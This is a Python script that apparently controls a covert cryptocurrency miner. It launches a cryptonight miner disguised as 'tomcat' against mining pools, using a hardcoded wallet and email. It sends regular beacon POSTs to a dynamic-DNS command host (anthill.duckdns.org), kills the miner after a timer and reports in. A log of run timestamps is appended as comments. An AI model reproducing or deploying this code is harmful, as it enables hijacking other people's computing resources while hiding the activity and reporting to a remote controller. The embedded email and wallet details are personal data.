import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:01.530553
#2018-02-17 16:21:03.943943
#2018-02-17 18:09:05.455375
#2018-02-17 19:56:06.392139
#2018-02-17 21:48:05.871968
#2018-02-17 23:33:01.549646
#2018-02-18 01:21:07.316809
#2018-02-18 03:08:01.600820
#2018-02-18 04:55:04.266473
#2018-02-18 06:46:05.765982
#2018-02-18 08:34:06.424489
#2018-02-18 10:21:05.778916
#2018-02-18 12:07:06.373874
#2018-02-18 13:52:06.129004
#2018-02-18 15:42:07.184390
#2018-02-18 17:32:04.932041
#2018-02-18 19:19:05.491854
#2018-02-18 21:05:06.934223
#2018-02-18 22:51:01.380076
#2018-02-19 00:38:06.717202
#2018-02-19 02:25:06.783281
#2018-02-19 04:11:06.515161
#2018-02-19 05:55:09.456215
#2018-02-19 07:45:05.828925
#2018-02-19 09:34:03.376603
#2018-02-19 11:24:03.911282
#2018-02-19 13:11:07.129989
#2018-02-19 14:59:07.397985
#2018-02-19 16:47:09.384853
#2018-02-19 18:35:01.902525
#2018-02-19 20:22:06.296909
#2018-02-19 22:11:08.522575
#2018-02-19 23:58:06.463674
#2018-02-20 01:45:05.752065
#2018-02-20 03:31:03.694070
#2018-02-20 05:18:01.399623
#2018-02-20 07:02:05.729095
#2018-02-20 08:49:05.813691
#2018-02-20 10:33:06.384241
#2018-02-20 12:18:01.850183
#2018-02-20 14:05:08.809163
#2018-02-20 15:50:03.039676
#2018-02-20 17:37:06.698233
#2018-02-20 19:26:07.909202
#2018-02-20 21:15:10.093865
#2018-02-20 23:01:06.854250
#2018-02-21 00:46:05.170668
#2018-02-21 02:32:07.210191
#2018-02-21 04:19:05.542700
#2018-02-21 06:06:05.468863
#2018-02-21 07:52:06.116597
#2018-02-21 09:37:06.252927
#2018-02-21 11:25:01.305095
#2018-02-21 13:13:08.836880
#2018-02-21 14:58:08.672316
#2018-02-21 16:46:06.954601
#2018-02-21 18:38:06.847773
#2018-02-21 20:23:07.757247
#2018-02-21 22:12:07.570346
#2018-02-22 00:01:01.646846
#2018-02-22 01:49:07.614240
#2018-02-22 03:37:05.380751
#2018-02-22 05:24:02.013819
#2018-02-22 07:09:07.457661
#2018-02-22 08:55:08.884054
#2018-02-22 10:43:01.916954
#2018-02-22 12:29:04.154845
#2018-02-22 14:13:07.915280
#2018-02-22 16:01:10.323289
#2018-02-22 17:47:07.295003
#2018-02-22 19:35:01.862039
#2018-02-22 21:27:01.795697
#2018-02-22 23:12:05.770661
#2018-02-23 00:58:01.414624
#2018-02-23 02:47:06.717028
#2018-02-23 04:35:08.135856
#2018-02-23 06:21:07.316011
#2018-02-23 08:08:07.335869
#2018-02-23 10:21:04.123277
#2018-02-23 12:13:01.522684
#2018-02-23 13:59:06.941006
#2018-02-23 15:52:04.317087
#2018-02-23 17:36:06.229652
#2018-02-23 19:22:08.302278
#2018-02-23 21:06:04.720338
#2018-02-23 22:52:08.053267
#2018-02-24 00:39:04.501640
#2018-02-24 02:28:08.140000
#2018-02-24 04:19:01.886597
#2018-02-24 06:07:06.607894
#2018-02-24 07:55:08.567029
#2018-02-24 09:39:07.322404
#2018-02-24 11:34:06.897572
#2018-02-24 13:24:06.745040
#2018-02-24 15:13:03.466778
#2018-02-24 17:02:05.457582
#2018-02-24 18:51:05.242665
#2018-02-24 20:41:05.798717
#2018-02-24 22:50:06.904137
#2018-02-25 02:11:01.237037
#2018-02-25 05:37:01.547752
#2018-02-25 11:35:04.765370